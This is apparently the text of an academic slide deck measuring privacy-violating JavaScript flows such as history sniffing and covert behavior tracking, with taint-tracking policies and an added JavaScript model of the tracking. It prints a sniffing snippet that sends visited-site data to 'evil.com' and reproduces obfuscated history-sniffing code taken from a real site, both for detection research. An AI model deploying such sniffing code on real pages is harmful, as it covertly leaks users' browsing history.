An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications
Dongseok Jang, Ranjit Jhala, Sorin Lerner, Hovav Shacham
UC San Diego
Motivation: Plenty of Mischief Possible!
Location Hijacking via document.location (phishing)
Cookie Stealing via document.cookie (identity theft)
History Sniffing: JavaScript tells visited links from not-visited ones
Behavior Tracking: "See absolutely everything visitors do on your webpage. …"
How Prevalent Are Malicious Flows?
How to Detect Malicious Flows?
Outline
Motivation
Flow Policies
Dynamic Flow Tracking
Flows in the Wild
Conclusions
Flow Policies: specify different types of flows
Policies: History Sniffing
1. Create an (invisible) link to a.com; its color depends on the browsing history
2. Inspect the link's color style property; the color says whether the link was visited
3. Send the sniffed info over the network

Policies: History Sniffing
    link = createLink("facebook.com");
    style = doc.getStyle(link);
    visited = style.color == "purple";
    send("evil.com", "facebook=" + visited);
Policies: History Sniffing
Inject Taints (at confidential sources):
    style = doc.getStyle(link);                 style is now tainted
Propagate Taints (at assignments, etc.):
    visited = style.color == "purple";          visited inherits the taint of style
    "facebook=" + visited                       the concatenation inherits the taint of visited
Block Taints (at untrusted sinks):
    send("evil.com", "facebook=" + visited);    the tainted argument is blocked at the sink
Flow Policies: Inject
    at doc.getStyle($1) if isLink($1) inject "secret"
Taint style with "secret"

Flow Policies: Block
    at send($1, $2) block "secret" on $2
Block tainted values sent to a third party

Flow Policies: General Form
    at Site if Cond inject Taint
    at Site block Taint on Param
Flow Policies are expressive: History Sniffing, Behavior Tracking, Cookie Stealing, Location Hijacking, …
Dynamic Flow Tracking: Rewrite JS code to carry taints
Pipeline: Source code → Parse → AST → Rewrite → AST → Execute
Dynamic Eval: code generated at runtime goes back through the same Parse/Rewrite path [Chander et al POPL 07]
Add .taint fields
Inject, Propagate, Block Taints in the rewritten code
Rewriting Issues: Boxing / Unboxing, Indirect Flows, Dynamic Eval
Implemented in Chrome/V8
Dynamic Flow Tracking: Performance (Overhead)
Performance: Policies
    Cookie Confidentiality: the cookie doesn't flow to a 3rd party
    Location Integrity: the location is unaffected by 3rd-party code
Performance: Benchmark
    10 sites with the largest JS code base in the Alexa top 100
    15 – 31 Kloc (avg. 21 Kloc)
Performance: Figures
    Timing overheads: page load (avg: 2x), JS execution (avg: 3x)
Performance: Upshot
    High for online use; acceptable for an offline survey
Flows “In the Wild”
History Sniffing
Behavior Tracking
History Sniffing: Figures
Alexa Top 50,000 sites
63 sites reported as sending history over network
1 site in Alexa Top 100
46 sites were real cases
History Sniffing: Example (1 site in Alexa Top 100)
    // Encrypted URLs: every character of each domain is shifted up by one code point
    var k = {0:"qpsoivc/dpn", 1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn" ...};
    var g = [];
    for (var m in k) {
        var d = k[m];
        var a = "";
        // Decrypt URL: shift each character back down by one
        for (f = 0; f < d.length; f++) a += String.fromCharCode(d.charCodeAt(f) - 1);
        var h = false;
        for (var j in { "http://": "", "http://www.": "" }) {
            // Create Link: append an anchor pointing at the decrypted URL
            var l = document.createElement("a");
            l.href = j + a;
            document.getElementById("ol").appendChild(l);
            // Inspect Color: a matching computed color means the link was visited
            var e = document.getComputedStyle(l).getPropertyValue("color");
            if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true }
        }
        if (h) { g.push(m) }
    }
Encrypted URLs → Decrypt URL → Create Link → Inspect Color
History Sniffing: Real Cases
Rank   Site           Desc      Src            Inspected URLs
61     youporn        adult     youporn        pornhub, tube8, + 21
867    charter.net    news      interclick     cars, edmunds, + 46
2333   feedjit        traffic   feedjit        twitter, facebook, + 6
2415   gamestorrents  game      meaningtool    amazon, ebay, + 220
2811   newsmax        news      interclick     cars, edmunds, + 46
3508   namepros       forum     feedjit        twitter, facebook, + 6
3603   fulltono       music     meaningtool    amazon, ebay, + 220
4266   youporngay     adult     youporngay     pornhub, tube8, + 21
4581   osdir          tech      interclick     cars, edmunds, + 46
5233   gamesfreak     game      interclick     cars, edmunds, + 46
+ 36 more cases…
Inclusion chains shown on the slides: charter.net → doubleclick.net → interclick; gamestorrents → harrenmedianetwork → meaningtool
History Sniffing: Upshot
# of sniffed URLs: 8 to 222
Of the 46 real cases: 39 had third-party sniffing code, 7 had home-grown code
Obfuscated sniffing code; code was generated at runtime
Behavior Tracking
Log user behavior by JS event handlers
Send the log back to the website

Behavior Tracking: Policy
    while (1) {
        e = getEvent();
        if (e.isMouseOver()) onMouseOver(e);
        if (e.isClick()) onClick(e);
        ...
    }
    onMouseOver = function(event) { isMouseOver = true; }

    at $1.isMouseOver() inject "secret"
    at $1.isClick() inject "secret"
    …
The slides highlight the test e.isMouseOver() and the literal true assigned under it: the event leaks indirectly, through the branch, not through a data assignment.
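The taint steps from the history-sniffing slides (inject at doc.getStyle, propagate through the comparison and the concatenation, block at send) and the indirect flow in the behavior-tracking policy above, as an added example that is not the paper's code or its Chrome/V8 implementation: values are boxed with a taint set, and a pc-taint stack marks values assigned inside a branch on a tainted test. getStyle, send, visitedHistory and the host names are constructed stand-ins.

```javascript
// Added example, not code from the paper: a small model of its dynamic taint
// tracking. Values are boxed as {v, t} with t a Set of taint labels; policy
// sources inject, operations propagate, and policy sinks block. A pc-taint
// stack models indirect flows through branches on tainted tests.
const box = (v, t = new Set()) => ({ v, t });
const union = (...sets) => new Set(sets.flatMap((s) => [...s]));
const pcStack = [];                                   // taints of enclosing branches
const pcTaint = () => union(...pcStack);

// Propagate: a result carries every operand's taint plus the current pc taint.
const op = (f, ...args) =>
  box(f(...args.map((a) => a.v)), union(pcTaint(), ...args.map((a) => a.t)));

// Source, policy "at doc.getStyle($1) if isLink($1) inject 'secret'".
// Constructed stand-in for the browser history: only facebook.com is visited.
const visitedHistory = new Set(["facebook.com"]);
function getStyle(link) {
  const color = visitedHistory.has(link.v) ? "purple" : "blue";
  return box({ color }, union(link.t, new Set(["secret"])));
}

// Sink, policy "at send($1, $2) block 'secret' on $2".
function send(host, data) {
  if (data.t.has("secret")) return { sent: false, reason: "secret to " + host.v };
  return { sent: true, payload: data.v };
}

// Direct flow: the slides' history-sniffing snippet run through the model.
function sniff(site) {
  const link = box(site);
  const style = getStyle(link);                              // inject
  const visited = op((s) => s.color === "purple", style);    // propagate
  return send(box("evil.com"), op((v) => site + "=" + v, visited)); // block
}

// Indirect flow: behavior tracking, policy "at $1.isMouseOver() inject 'secret'".
// The literal true is untainted; it inherits the taint of the test it depends on.
function trackMouseOver(eventIsMouseOver) {
  let flag = box(false);
  const test = box(eventIsMouseOver, new Set(["secret"]));  // inject at the test
  pcStack.push(test.t);                                     // enter tainted branch
  if (test.v) flag = op(() => true);                        // true picks up pc taint
  pcStack.pop();
  return send(box("tracker.example"), flag);
}
```

The model marks only the branch that actually executes, so trackMouseOver(false) still sends an untainted false; that not-taken-branch gap is the usual limit of pc-based tracking and is separate from what the slides show.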
Behavior Tracking: Figures
Alexa Top 1300 sites
328 sites sent behavior
115 sites sent behavior covertly
10 sampled for manual inspection
7 flows manually reconstructed
Method: automatically trigger JS event handlers; many are user-visible (image swapping)
Covert filter: response < 100 bytes
Behavior Tracking: Real Cases
Rank   Site          Desc       Events
3      youtube       media      click
11     yahoo.co.jp   portal     click
15     sina.com.cn   portal     click
19     microsoft     software   click, mouseover
34     mail.ru       email      click
53     soso          search     click
65     about         search     click
Third-party tracker named on the slide: webtrends.com
Conclusions
Flows Occur In The Wild: real cases for further study
Dynamic Approach is Required: code is obfuscated & dynamically generated
Future work
    Larger Scale Study on Flows: deeper crawl & other types of flow
    Bullet-proof Protection Tool: policy enforcement without much slowdown & many false alarms
Thank you!